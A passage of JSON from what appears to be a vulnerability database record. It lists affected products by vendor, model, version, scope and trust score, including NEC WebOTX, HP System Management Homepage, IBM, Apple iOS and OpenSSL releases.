application server", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "web edition v7.1 to v8.1" }, { "model": "webotx enterprise service bus", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "v6.4 to v9.2" }, { "model": "webotx portal", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "v8.2 to v9.1" }, { "model": "webotx sip application server", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "standard edition v7.1 to v8.1" }, { "model": "websam", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "application navigator agent ver3.3 to ver4.1" }, { "model": "websam", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "application navigator manager ver3.2.2 to ver4.1" }, { "model": "websam", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "application navigator probe option ver3.1.0.x to ver4.1.0.x" }, { "model": "websam", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "jobcenter r14.1" }, { "model": "system management homepage", "scope": "ne", "trust": 0.6, "vendor": "hp", "version": "7.5" }, { "model": "system management homepage", "scope": "eq", "trust": 0.6, "vendor": "hp", "version": "7.4" }, { "model": "hp-ux b.11.23 (11i", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "v2)" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.1" }, { "model": "netezza platform software 7.0.4.8-p2", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "aura collaboration environment", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "3.0" }, { "model": "flex system en2092 1gb ethernet scalable switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.8.60" }, { "model": "informix genero", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.32" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.3.1" }, { "model": "bladecenter advanced management module 25r5778", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "security network controller 1.0.3361m", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.10.186" }, { "model": "algo one ase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.7" }, { "model": "system networking rackswitch g8124e", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.11.4.0" }, { "model": "bladecenter -s", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1948" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "gb esm ethernet switch", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1/107.4.11.0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.2.6" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.0" }, { "model": "virtual fabric 10gb switch module for bladecenter", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.8.20.0" }, { "model": "icewall mcrp sp1", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.211" }, { "model": "project openssl 0.9.8f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "pureapplication system interim fix", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "2.0.0.1" }, { "model": "sbr carrier", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "i operating system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.12" }, { "model": "peoplesoft enterprise peopletools", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "8.53" }, { "model": "virtual fabric 10gb switch module for bladecenter", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.8.6.0" }, { "model": "algo one core", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.7" }, { "model": "project openssl 1.0.0d", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.1e", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.2" }, { "model": "insight orchestration", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.2" }, { "model": "netezza platform software 7.0.4.7-p1", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "informix genero", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.41" }, { "model": "project openssl beta3", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.1" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.5" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.4" }, { "model": "mysql enterprise monitor", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3.0.20" }, { "model": "project openssl 0.9.8u", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.8.780" }, { "model": "project openssl 1.0.1a", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "contactoptimization", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "insight orchestration", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.5.0" }, { "model": "project openssl b", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.2.2" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.6" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.1" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.4" }, { "model": "contactoptimization", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.1" }, { "model": "aspera shares", "scope": "eq", "trust": 0.3, "vendor": "asperasoft", "version": "1.7.5" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7" }, { "model": "version control agent", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.5.0" }, { "model": "worklight foundation consumer edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.20" }, { "model": "cms", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "17.0" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.5.0.1" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "8.2" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.2" }, { "model": "abyp-4tl-p", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "rational tau", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.35" }, { "model": "communications session border controller scz7.4.0", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.15" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.2" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.0.1" }, { "model": "infosphere information server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "11.3" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.2.0" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1209" }, { "model": "project openssl k", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.24" }, { "model": "campaign", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.0.4" }, { "model": "project openssl 1.0.2a", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "8.4" }, { "model": "qradar security information and event manager mr2 patch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.16" }, { "model": "netezza platform software 7.2.0.4-p3", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "project openssl 1.0.0g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "workload deployer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.16" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.3" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.8" }, { "model": "tivoli netcool/reporter", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "8.1.3" }, { "model": "vios fp-25 sp-02", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.4" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "7.0.3" }, { "model": "endeca server", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "7.6.1.0.0" }, { "model": "system networking rackswitch g8124", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.11.4.0" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.3361" }, { "model": "sterling integrator", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.2.10" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.1" }, { "model": "netezza platform software 7.0.2.16-p3", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.7" }, { "model": "sametime", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.0.1" }, { "model": "initiate master data service", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.2" }, { "model": "project openssl 0.9.8zb", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "netscaler t1", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "0" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0.0-68" }, { "model": "worklight foundation enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.20" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1.0.842" }, { "model": "systems director", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "ios", "scope": "ne", "trust": 0.3, "vendor": "apple", "version": "9" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0.0" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8.1" }, { "model": "linux i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.3.0.870" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.2" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0.2-77" }, { "model": "netezza platform software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.3" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.17" }, { "model": "campaign", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1" }, { "model": "system networking rackswitch g8332", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.7.20.0" }, { "model": "image construction and composition tool", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3.1.0" }, { "model": "project openssl 1.0.1m", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "contactoptimization", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0.0.840" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.4" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.3.0" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "7.1.1" }, { "model": "infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "5.0" }, { "model": "project openssl 1.0.0r", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0.2.77" }, { "model": "project openssl 0.9.8w", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "7.1" }, { "model": "cognos tm1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.5.2" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0" }, { "model": "service delivery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.1" }, { "model": "tivoli workload scheduler for applications", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4" }, { "model": "flex system fabric en4093r 10gb scalable switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.8.6.0" }, { "model": "flashsystem 9843-ae1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "840" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.27" }, { "model": "campaign", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.11" }, { "model": "project openssl 1.0.0m", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.2.27" }, { "model": "sterling connect:express for unix ifix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.11150-11" }, { "model": "rational application developer for websphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.1" }, { "model": "business server", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "1" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.8" }, { "model": "project openssl 1.0.1g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.4" }, { "model": "g8264cs si fabric image", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.8.10.0" }, { "model": "contactoptimization", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.0" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.1.1" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "enterprise manager ops center", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11.1" }, { "model": "project openssl 0.9.8m", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "flex system cn4093 10gb scalable switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.8.10.0" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "2.0" }, { "model": "ds8870", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "87.41.32.0" }, { "model": "mysql enterprise monitor", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "2.3" }, { "model": "project openssl j", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "qlogic 8gb intelligent pass-thru module \u0026 san switch module", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.10.1.31.00" }, { "model": "rational application developer for websphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "command center appliance", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "0" }, { "model": "workload deployer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "security virtual server protection for vmware", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.1" }, { "model": "gb esm ethernet switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1/107.4.10.0" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0.96" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.4" }, { "model": "sterling connect:enterprise for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.5.0.0" }, { "model": "bladecenter -t", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8720" }, { "model": "aspera shares", "scope": "eq", "trust": 0.3, "vendor": "asperasoft", "version": "1.0.1" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.3.23" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.5" }, { "model": "flex system cn4093 10gb scalable switch", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.8.11.0" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.5.0.2" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.4.2.1" }, { "model": "tivoli common reporting", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.1.2" }, { "model": "qradar security information and event manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.4" }, { "model": "qradar security information and event manager mr2 patch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.17" }, { "model": "netezza platform software 7.0.2.15-p1", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.0" }, { "model": "initiate master data service patient hub", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.7" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.6.156" }, { "model": "ds8700", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "87.31.16.0" }, { "model": "netscaler gateway", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "0" }, { "model": "project openssl 1.0.1i", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.12" }, { "model": "enterprise manager ops center", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11.1.3" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.913" }, { "model": "alienvault", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.13" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "sdk for node.js", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.13" }, { "model": "systems director", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.1.1" }, { "model": "infosphere guardium database activity monitoring", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "infosphere master data management patient hub", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0" }, { "model": "campaign", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.10" }, { "model": "sametime unified telephony", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.5.0.0" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.6" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.6" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "14.10" }, { "model": "alienvault", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.12" }, { "model": "qradar security information and event manager patch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.43" }, { "model": "flex system en4023 10gb scalable switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "flex system fc5022 16gb san scalable switch 7.2.1c", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "virtual fabric 10gb switch module for bladecenter", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "6.8.21.0" }, { "model": "mobilefirst platform foundation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.0.0" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.211" }, { "model": "bladecenter -s", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8886" }, { "model": "system networking rackswitch g8124e", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.11.3.0" }, { "model": "cognos controller if4", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "campaign", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.10" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.9" }, { "model": "communications session border controller scz7.3.0", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.2.7" }, { "model": "real-time compression appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.9" }, { "model": "enterprise manager ops center", "scope": "ne", "trust": 0.3, "vendor": "oracle", "version": "12.2" }, { "model": "sterling connect:enterprise for unix ifix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4.4.03" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.7" }, { "model": "project openssl 0.9.8r", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.21" }, { "model": "aspera faspex", "scope": "eq", "trust": 0.3, "vendor": "asperasoft", "version": "3.0.3" }, { "model": "algo one pcre", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.7" }, { "model": "aspera ondemand", "scope": "eq", "trust": 0.3, "vendor": "asperasoft", "version": "3.5" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.1" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.16" }, { "model": "qradar security information and event manager patch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.42" }, { "model": "project openssl 0.9.8n", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "bundle of g8264cs image", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.8.10.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.14" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.9.2" }, { "model": "virtual connect enterprise manager sdk", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4" }, { "model": "abyp-2t-1s-1l-p-m", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "project openssl beta1", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.2" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3" }, { "model": "rational tau", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.36" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.2.0.820" }, { "model": "aspera console", "scope": "eq", "trust": 0.3, "vendor": "asperasoft", "version": "2.5.3" }, { "model": "sametime", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2.1" }, { "model": "security network controller 1.0.3350m", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "initiate master data service", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.5" }, { "model": "mysql enterprise monitor", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3.0" }, { "model": "project openssl 0.9.8y", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "cognos metrics manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2" }, { "model": "aspera connect server", "scope": "eq", "trust": 0.3, "vendor": "asperasoft", "version": "3.5.4" }, { "model": "netezza platform software 7.2.0.4-p2", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "icewall sso agent option", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "8.02007" }, { "model": "mac os", "scope": "ne", "trust": 0.3, "vendor": "apple", "version": "x10.11" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "5.1.1" }, { "model": "campaign", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "project openssl beta4", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.0" }, { "model": "campaign", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.3" }, { "model": "websphere mq", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.3" }, { "model": "sterling connect:enterprise for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4.4.0" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.213" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.11" }, { "model": "infinity", "scope": "ne", "trust": 0.3, "vendor": "pexip", "version": "9.0" }, { "model": "contactoptimization", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.6" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.0.1" }, { "model": "tssc/imc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.4" }, { "model": "project openssl 1.0.0l", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.6" }, { "model": "systems director", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.20" }, { "model": "netscaler application delivery controller", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "0" }, { "model": "cognos insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.1" }, { "model": "project openssl beta5", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.0" }, { "model": "rational tau", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.34" }, { "model": "bladecenter -e", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7967" }, { "model": "abyp-2t-1s-1l-p", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "system networking rackswitch g8124", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.9.13.0" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.4.1.1" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "6.0.2" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.3" }, { "model": "system networking rackswitch g8052", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.9.14.0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.3" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0.68" }, { "model": "opensuse", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "13.2" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.0.0" }, { "model": "flex system fabric en4093r 10gb scalable switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.8.9" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "3.2" }, { 